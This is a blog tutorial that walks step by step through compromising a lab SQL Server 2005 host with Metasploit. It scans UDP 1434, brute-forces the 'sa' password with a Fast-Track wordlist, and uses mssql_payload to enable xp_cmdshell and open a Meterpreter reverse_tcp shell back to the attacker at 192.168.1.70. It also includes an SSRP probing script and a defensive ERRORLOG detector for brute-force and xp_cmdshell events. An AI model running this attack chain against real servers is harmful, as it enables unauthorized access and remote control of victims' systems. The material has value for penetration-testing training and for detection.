
By: S-Connect
July 20, 2016
Tutorial: Exploiting MS SQL Server with Metasploit - Fast Track

Lab setup used for this walkthrough:

- Windows XP Pro Service Pack 2 (unpatched)
- Firewall and software updates switched off
- Microsoft Internet Information Services (IIS) and the FTP service enabled
- SQL Server 2005 Express configured
- A vulnerable web app up and running
First, check whether the SQL Server Browser service is listening on UDP 1434, the port it uses to advertise instances:

nmap -sU 192.168.1.79 -p1434

PORT     STATE         SERVICE
1434/udp open|filtered ms-sql-m

The scan points at a SQL Server host, but note what open|filtered means: nmap got no answer at all. The Browser service only replies to a correctly formed request, not to an empty probe, so the port is not yet confirmed. Metasploit's mssql_ping sends that request and returns whatever the service advertises:

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit
[*] SQL Server information for 192.168.1.79:
[+] ServerName = LAB
[+] InstanceName = SQLEXPRESS
[+] IsClustered = No
[+] Version = 9.00.1399.06
[+] tcp = 1433
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
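mssql_ping speaks the SQL Server Resolution Protocol (SSRP, MS-SQLR) to the Browser service: a one-byte CLNT_UCAST_EX request, answered by a SVR_RESP datagram carrying semicolon-separated key/value pairs for each instance. As an added example that is not part of the original tutorial or of Metasploit, the Python below builds that request, parses the reply into one record per instance and maps the Version field to a product name. The sample datagram is constructed here from the values in the output above (it is not captured traffic), and the version-to-product table is an assumption beyond what the page shows.

```python
import socket
import struct

# SSRP (MS-SQLR) message types. The SQL Server Browser service listens on
# UDP/1434 and only answers well-formed requests, which is why a bare UDP
# scan reports the port as open|filtered.
CLNT_UCAST_EX = b"\x03"   # ask for every instance on the host
SVR_RESP = 0x05           # leading byte of every server reply

# Major.minor of the Version field -> product (assumed table, not from the page).
PRODUCT_BY_VERSION = {
    (8, 0): "SQL Server 2000",
    (9, 0): "SQL Server 2005",
    (10, 0): "SQL Server 2008",
    (10, 50): "SQL Server 2008 R2",
    (11, 0): "SQL Server 2012",
    (12, 0): "SQL Server 2014",
    (13, 0): "SQL Server 2016",
}


def encode_svr_resp(instances):
    """Build a SVR_RESP datagram: 0x05, little-endian length, then each
    instance as 'key;value;key;value' terminated by ';;'. Used here only to
    construct sample input in the layout the Browser service produces."""
    body = "".join(
        ";".join(f"{k};{v}" for k, v in inst.items()) + ";;" for inst in instances
    ).encode("ascii")
    return bytes([SVR_RESP]) + struct.pack("<H", len(body)) + body


def parse_svr_resp(datagram):
    """Decode a SVR_RESP datagram into one dict per advertised instance."""
    if len(datagram) < 3 or datagram[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP datagram")
    (size,) = struct.unpack_from("<H", datagram, 1)
    body = datagram[3:3 + size].decode("ascii", errors="replace")
    instances = []
    for record in body.split(";;"):
        if not record:
            continue
        fields = record.split(";")
        # fields alternate key, value; zip silently drops a dangling odd field
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def product_name(version):
    """Map a Version string such as '9.00.1399.06' to a product name."""
    parts = version.split(".")
    try:
        key = (int(parts[0]), int(parts[1]))
    except (ValueError, IndexError):
        return "unknown"
    return PRODUCT_BY_VERSION.get(key, f"unknown (build {version})")


def ssrp_ping(host, timeout=2.0):
    """Live check: send CLNT_UCAST_EX to host:1434/udp and parse the reply."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(CLNT_UCAST_EX, (host, 1434))
        data, _ = s.recvfrom(65535)
    return parse_svr_resp(data)


# Constructed sample mirroring the mssql_ping output above (not captured traffic).
SAMPLE_RESPONSE = encode_svr_resp([{
    "ServerName": "LAB",
    "InstanceName": "SQLEXPRESS",
    "IsClustered": "No",
    "Version": "9.00.1399.06",
    "tcp": "1433",
}])

if __name__ == "__main__":
    for inst in parse_svr_resp(SAMPLE_RESPONSE):
        print(inst["ServerName"], inst["InstanceName"], inst.get("tcp"),
              product_name(inst["Version"]))
```

ssrp_ping("192.168.1.79") does the live query; everything else runs offline. The tcp field is the one to keep: a named instance such as SQLEXPRESS is frequently not on 1433, and the Browser reply is the simplest unauthenticated way to learn which port to brute force.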
That is everything the next step needs: the instance name, the build (9.00.1399 is SQL Server 2005 RTM, matching the lab setup) and the TCP port, 1433, that the instance actually listens on. Now brute force the login with mssql_login, which targets the 'sa' user by default, using the Fast-Track wordlist that ships with the Social-Engineer Toolkit (SET). Keep in mind that a SQL login created with the Windows password policy enforced can be locked out by this kind of guessing:

msf > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txt
PASS_FILE => /usr/share/set/src/fasttrack/wordlist.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_login) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) > exploit
[+] 192.168.1.79:1433 - MSSQL - successful login 'sa' : 'password1'
The 'sa' password has been guessed, and 'sa' is a member of the sysadmin role, which is exactly what the next module needs. mssql_payload logs in over TDS with those credentials, turns on the xp_cmdshell extended stored procedure through sp_configure if the server has it disabled (the default since SQL Server 2005), and then uses xp_cmdshell to run the operating-system commands that write the payload to disk and launch it:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(mssql_payload) > set PASSWORD password1
PASSWORD => password1
msf exploit(mssql_payload) > exploit
[*] Started reverse handler on 192.168.1.70:443
[*] The server may have xp_cmdshell disabled, trying to enable it...
[*] Command Stager progress - 1.47% done (1499/102246 bytes)
[….]
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100
meterpreter >
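The chain above leaves two artefacts on the server: a burst of failed 'sa' logins from a single client, and an sp_configure change turning xp_cmdshell on. Both land in the SQL Server ERRORLOG under the default audit setting (failed logins only). As an added example, not part of the original post, the Python below runs a small detector over constructed ERRORLOG lines: a threshold of failures from one client inside a time window raises a brute-force finding, and an xp_cmdshell enable that follows within ten minutes is attributed to that client. The ERRORLOG line layout, the sample lines, and the threshold, window and link-window values are all assumptions made for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# ERRORLOG line shapes this detector understands (assumed layout:
# timestamp, source column, message).
LOGIN_FAIL = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+Logon\s+"
    r"Login failed for user '([^']+)'.*\[CLIENT: ([\d.]+)\]"
)
CONFIG_CHANGE = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+spid\d+\s+"
    r"Configuration option '([^']+)' changed from (\d) to (\d)\."
)


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")


def analyze(lines, threshold=5, window=timedelta(seconds=60),
            link_window=timedelta(minutes=10)):
    """Return (kind, client_ip, detail) findings from ERRORLOG lines.

    'bruteforce': `threshold` failed logins from one client inside `window`,
    reported once per client when the threshold is first crossed.
    'xp_cmdshell_enabled': sp_configure switched xp_cmdshell on; if a client
    was flagged for brute force within `link_window` before it, it is named.
    """
    findings = []
    recent = defaultdict(deque)   # client ip -> timestamps of recent failures
    flagged = {}                  # client ip -> time brute force was flagged
    for line in lines:
        m = LOGIN_FAIL.match(line)
        if m:
            when, user, client = _ts(m.group(1)), m.group(2), m.group(3)
            hits = recent[client]
            hits.append(when)
            while when - hits[0] > window:   # drop failures outside the window
                hits.popleft()
            if len(hits) >= threshold and client not in flagged:
                flagged[client] = when
                findings.append(("bruteforce", client,
                                 f"{len(hits)} failed logins as '{user}' in {window}"))
            continue
        m = CONFIG_CHANGE.match(line)
        if m and m.group(2) == "xp_cmdshell" and m.group(4) == "1":
            when = _ts(m.group(1))
            linked = [ip for ip, t in flagged.items()
                      if timedelta(0) <= when - t <= link_window]
            detail = "xp_cmdshell turned on via sp_configure"
            if linked:
                detail += f" {(when - flagged[linked[0]]).seconds}s after brute force"
            findings.append(("xp_cmdshell_enabled", linked[0] if linked else None, detail))
    return findings


def _fail(ts, client):
    """Two constructed ERRORLOG lines for one failed SQL login (error 18456)."""
    return (f"{ts} Logon       Error: 18456, Severity: 14, State: 8.\n"
            f"{ts} Logon       Login failed for user 'sa'. [CLIENT: {client}]")


# Constructed sample: one stray failure from another host, five failures from
# the attacker inside a few seconds, then the sp_configure changes the module makes.
SAMPLE_ERRORLOG = "\n".join(
    [_fail("2016-07-20 10:38:50.01", "192.168.1.5")]
    + [_fail(f"2016-07-20 10:39:1{i}.00", "192.168.1.70") for i in range(5)]
    + ["2016-07-20 10:39:46.10 spid52      Configuration option 'show advanced options' "
       "changed from 0 to 1. Run the RECONFIGURE statement to install.",
       "2016-07-20 10:39:46.12 spid52      Configuration option 'xp_cmdshell' "
       "changed from 0 to 1. Run the RECONFIGURE statement to install."]
)

if __name__ == "__main__":
    for kind, client, detail in analyze(SAMPLE_ERRORLOG.splitlines()):
        print(kind, client, detail)
```

Feed it a real ERRORLOG with analyze(open(path, encoding="utf-16").read().splitlines()) (the file is UTF-16 on most installs) and tune threshold and window to the environment; the 'show advanced options' change is deliberately ignored because legitimate administration flips it constantly, while xp_cmdshell going from 0 to 1 is rare enough to alert on unconditionally.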
So, I'm inside the target machine with a Meterpreter shell, reached with nothing more than a guessable 'sa' password: the "trying to enable it" line is the xp_cmdshell switch being flipped, and the command stager that follows pushes the payload through that procedure in small chunks until it can be executed. I hope this was helpful to you. Please post your comments and questions below.